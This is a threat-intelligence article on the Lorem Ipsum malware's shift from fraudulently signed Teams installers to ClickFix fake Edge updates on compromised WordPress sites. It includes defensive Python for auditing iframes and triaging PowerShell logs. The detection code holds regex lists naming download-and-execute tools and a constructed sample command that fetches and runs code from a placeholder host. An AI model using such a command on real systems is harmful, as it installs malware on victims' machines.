The Lorem Ipsum malware switched delivery vectors in less than a week after Microsoft dismantled Fox Tempest in May 2026. According to a BlueVoyant report, the operator dropped trojanized Microsoft Teams installers bearing fraudulent certificates in favor of ClickFix tactics on legitimate, compromised WordPress sites. The case illustrates how disruption of criminal infrastructure accelerates tactical innovation rather than halting it.
- BlueVoyant has tracked the Lorem Ipsum campaign since February 2026; its original vector relied on Teams installers signed with Microsoft Trusted Signing certificates obtained through Fox Tempest.
- Microsoft revoked more than 1,000 certificates in the Fox Tempest takedown; the pivot to ClickFix was observed days later, in late May 2026.
- The new vector exploits at least five compromised WordPress sites across diverse sectors, using iframe injection to trick victims into running a PowerShell command disguised as an Edge update.
- BlueVoyant assesses with high confidence that the campaign is linked to Rapid Brigantine (Vanilla Tempest, DEV-0832), a group active since 2022 and associated with enterprise ransomware families.
The Original Chain: Trust Built on Digital Signatures
Since February 2026, Lorem Ipsum operated through altered Microsoft Teams installers distributed via SEO poisoning and malvertising on download portals. The executables were signed with Microsoft Trusted Signing certificates fraudulently obtained through the Fox Tempest service, also known as Forging Marauder. The digital signature lent apparent legitimacy, reducing interception rates by security controls reliant on certificate reputation.
The original infection chain employed DLL sideloading, encrypted payloads, and a command-and-control system that abused the LetsDiskuss[.]com blogging platform as a dead drop to dynamically retrieve C2 server addresses. The malware assigned unique identifiers to track and manage individual infections, indicating a structured, monitored operation.
The Takedown and Immediate Response: From Signed Installers to ClickFix
Microsoft dismantled Fox Tempest in May 2026, revoking more than 1,000 Microsoft Trusted Signing certificates. The operation stripped Lorem Ipsum of its distribution model. BlueVoyant observed the pivot in late May 2026, days after the takedown: operators migrated to a mechanism that eliminates reliance on code signing entirely.
"The loss of certificate supply rendered the previous signed-installer delivery model unviable, forcing the operators to adopt a delivery mechanism that eliminates code signing entirely"
The new vector operates through at least five legitimate, compromised WordPress sites active in sectors including architecture, legal services, and construction technology. An injected iframe displays a fake browser update notification. The victim is tricked into pasting a PowerShell command into Windows Terminal, disguised as a "Microsoft Edge security intelligence update." Execution silently downloads and launches the malware, accompanied by a fake success message.
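As an added example, not code from the BlueVoyant report or from any WordPress project, the Python below is a site-owner check for the iframe injection described above: it parses a page's rendered HTML and flags frames from unexpected origins, frames hidden with CSS, or frames that overlay the viewport the way a fake update notice does. The allowlist, hostnames and sample HTML are constructed for this example.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Audit the rendered HTML of a WordPress page for iframes that should not be
# there: unexpected origins, CSS-hidden frames, or full-viewport overlays.
# The expected-embed allowlist and the sample page are constructed.

EXPECTED_FRAME_HOSTS = {"www.youtube.com", "player.vimeo.com"}  # assumed embeds
HIDDEN_CSS = ("display:none", "visibility:hidden", "opacity:0", "left:-", "top:-")

class IframeCollector(HTMLParser):
    """Collect the attribute dict of every <iframe> start tag."""
    def __init__(self):
        super().__init__()
        self.frames = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.frames.append({k: (v or "") for k, v in attrs})

def audit_iframes(html: str, site_host: str) -> list:
    """Return one finding per suspicious iframe; an empty list means clean."""
    collector = IframeCollector()
    collector.feed(html)
    findings = []
    for frame in collector.frames:
        src = frame.get("src", "")
        host = urlparse(src).hostname or site_host  # relative src = own origin
        style = frame.get("style", "").replace(" ", "").lower()
        reasons = []
        if host != site_host and host not in EXPECTED_FRAME_HOSTS:
            reasons.append(f"unexpected origin {host}")
        if any(marker in style for marker in HIDDEN_CSS):
            reasons.append("hidden via CSS")
        full_size = frame.get("width") == "100%" and frame.get("height") == "100%"
        if "position:fixed" in style or full_size:
            reasons.append("overlays the page")
        if "srcdoc" in frame:
            reasons.append("inline srcdoc content")
        if reasons:
            findings.append({"src": src, "reasons": reasons})
    return findings

# Constructed page: one legitimate video embed, one injected overlay frame.
SAMPLE_HTML = """<html><body><h1>Projects</h1>
<iframe src="https://www.youtube.com/embed/abc123" width="560" height="315"></iframe>
<iframe src="https://cdn.update-notice.invalid/edge.html"
 style="position: fixed; top: 0; left: 0; width: 100%; height: 100%; z-index: 9999"></iframe>
</body></html>"""
```

Run `audit_iframes(SAMPLE_HTML, "www.example-architects.invalid")` against a copy of the page fetched as a visitor would see it, since the injection sits in the served HTML rather than in the WordPress editor.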
Target Expansion: From Intentional Searchers to Anyone Browsing
The transition significantly broadens the potential victim pool. The old vector targeted users actively seeking Microsoft Teams installers on SEO-poisoned portals. The new vector exposes anyone visiting one of the compromised WordPress sites, regardless of search intent. Domain-reputation controls become ineffective: the hosting sites are legitimate, and the compromise lies beneath the user-visible page.
"The pivot significantly broadens the potential victim pool from users who encountered fake Microsoft Teams installers on SEO-poisoned and malvertised download portals to anyone browsing one of the compromised WordPress sites"
The dossier does not specify whether the WordPress sites were compromised specifically for this campaign or if a pre-existing breach was subsequently repurposed. The exact number of victims from the new vector is not quantified.
Attribution to Rapid Brigantine: From Mid-Tier IAB to Enterprise Ransomware Operator
BlueVoyant has revised its assessment of the actor. Initially classified as a mid-tier initial access broker (IAB), Lorem Ipsum is now assessed with high confidence to be linked to Rapid Brigantine, also tracked as Vanilla Tempest, DEV-0832, and previously associated with the Vice Society brand. The group has been active since at least mid-2022 and is linked to enterprise-grade ransomware families: Rhysida, BlackCat, Zeppelin, and Quantum Locker.
BlueVoyant cites three linkage indicators: a Microsoft report from October 2025 documenting a Vanilla Tempest campaign with Teams installers; shared use of Fox Tempest/Forging Marauder for certificate acquisition; and DFIR reports where loaders associated with Lorem Ipsum delivered backdoors attributed to Rapid Brigantine. It remains unclear whether Rapid Brigantine operates the campaign directly or acquires it from a third-party IAB.
Why It Matters
The Lorem Ipsum case illustrates a systemic pattern in contemporary cybercrime: disrupting a friction point—the signed-certificate supply chain—does not stop the threat but alters its geometry, pushing it toward vectors harder to intercept with traditional controls. ClickFix requires no digital signature, depends on no newly registered malicious domains, and exploits voluntary user execution to bypass automated protections.
The source does not document specific remediation measures for exposed organizations. The dossier does not specify the nature of exposed data or the presence of ClickFix payload variants for browsers other than Microsoft Edge. The campaign remains active: the operators' operational resilience, measured in days rather than months, is the critical metric for evaluating disruption effectiveness.
For the enterprise sector, the implicit takeaway is prioritizing behavioral detections over static indicators, given the demonstrated capacity for rapid pivot. The source does not, however, list specific technical configurations or controls to enable.
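The pivot described on this page replaces a static artifact (a signing certificate that can be revoked) with a user action, which is why the article points at behavioral detection. As an added example, not from the BlueVoyant report or any vendor product, the Python below triages PowerShell Script Block Logging (Event ID 4104) records for the ClickFix behavior described earlier: a command pasted into an interactive console that fetches and executes remote content. The events, lure string and hostnames are constructed, and the regex lists are illustrative assumptions, not indicators from the campaign.

```python
import re

# Triage PowerShell Script Block Logging events (Event ID 4104) for the
# behaviour of a ClickFix paste: a command typed at an interactive prompt that
# fetches remote content and executes it. Because the victim pastes into an
# already-running console, the text never reaches a process command line; 4104
# records it, and its Path field is empty when the block came from the prompt
# rather than from a .ps1 file. Patterns and events below are constructed.

FETCH = re.compile(
    r"\b(iwr|irm|curl|wget|Invoke-WebRequest|Invoke-RestMethod|DownloadString|"
    r"DownloadFile|Net\.WebClient|Start-BitsTransfer)\b", re.I)
EXECUTE = re.compile(
    r"(\biex\b|Invoke-Expression|Start-Process|-enc(odedcommand)?\b)", re.I)
EVASION = re.compile(
    r"(-w(indowstyle)?\s+hidden|-nop\b|-ep\s+bypass|-ExecutionPolicy\s+Bypass)", re.I)
LURE = re.compile(r"(update\s+(complete|installed|successful)|security intelligence)", re.I)

def score_script_block(event: dict) -> dict:
    """Classify one 4104 event; 'clickfix_suspect' needs fetch + execute + interactive."""
    text = event.get("ScriptBlockText", "")
    hits = {
        "fetch": bool(FETCH.search(text)),
        "execute": bool(EXECUTE.search(text)),
        "evasion": bool(EVASION.search(text)),
        "lure_message": bool(LURE.search(text)),
        "interactive": event.get("Path", "") == "",
    }
    # Fetch + execute from a saved script is routine deployment; the same pair
    # typed at an interactive prompt is the ClickFix signature.
    core = hits["fetch"] and hits["execute"] and hits["interactive"]
    return {"verdict": "clickfix_suspect" if core else "benign",
            "score": sum(hits.values()), "hits": hits}

def triage(events: list) -> list:
    """Score a batch of 4104 events, preserving input order."""
    return [score_script_block(e) for e in events]

# Constructed 4104 records (ScriptBlockText, Path); not indicators from the report.
SAMPLE_EVENTS = [
    {"ScriptBlockText": "Get-ChildItem C:\\Logs | Sort-Object LastWriteTime", "Path": ""},
    {"ScriptBlockText": "Invoke-WebRequest -Uri https://intranet.example/agent.msi "
                        "-OutFile C:\\Temp\\agent.msi", "Path": "C:\\Scripts\\deploy.ps1"},
    {"ScriptBlockText": "$u='http://cdn.update-notice.invalid/edge';iex(iwr $u -UseBasicParsing);"
                        "Write-Host 'Microsoft Edge security intelligence update complete'",
     "Path": ""},
]
```

Script Block Logging must be enabled for 4104 events to exist at all; without it, the only remaining telemetry is the child processes and files the pasted command creates.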
The shift from trust based on cryptographic infrastructure to trust based on social engineering is not a technical regression: it is an evolutionary adaptation that exploits user familiarity with update procedures and the psychological pressure of security. The defensive line moves from the perimeter gateway to individual behavior, with all the uncertainty that entails.
Information is based on the cited advisory and current as of publication.